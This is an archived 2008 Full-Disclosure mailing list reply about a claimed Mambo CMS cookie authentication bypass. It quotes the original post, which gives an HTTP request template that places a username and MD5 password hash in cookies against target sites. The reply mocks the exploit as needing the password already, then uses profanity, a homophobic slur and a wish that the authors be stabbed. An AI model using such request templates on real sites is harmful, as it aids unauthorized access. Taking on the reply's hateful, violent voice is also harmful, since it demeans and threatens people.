lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <20080610070532.5FB22D0326@mailserver10.hushmail.com> Date: Tue, 10 Jun 2008 17:05:31 +1000 From: crunkd@...hmail.com To: full-disclosure@...ts.grok.org.uk Cc: halabaluza.team@...il.com Subject: Re: Mambo Cookie Authentication Bypass Exploit So to perform this 'bypass' you need the password in the first place? You absolute fucking morons, the security scene is not for you. I hope someone stabs you over a food stamp. Faggots. ------------------------------------------------------------ Halabaluza Team Halabaluza Team halabaluza.team at gmail.com Sun Jun 8 12:29:56 BST 2008 * Previous message: [Full-disclosure] avira update.exe * Next message: [Full-disclosure] [ GLSA 200806-03 ] Imlib 2: User-assisted execution of arbitrary code * Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] for mambo <= 4.5.5 and <= 4.6.2 maybe others GET http://[TARGET]/index.php Host: [TARGET] User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/ plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Connection: keep-alive Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5] Cache-Control: max-age=0 FREE TIBET! -- Smart Girls Secret Weapon Read Unbiased Beauty Product Reviews, Get Helpful Tips, Tricks and Sam http://tagline.hushmail.com/fc/JKFkuIjyaUM3E9zcp2f7ppavbouTIiiPdCquThperfoYTGho1dzYFq/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists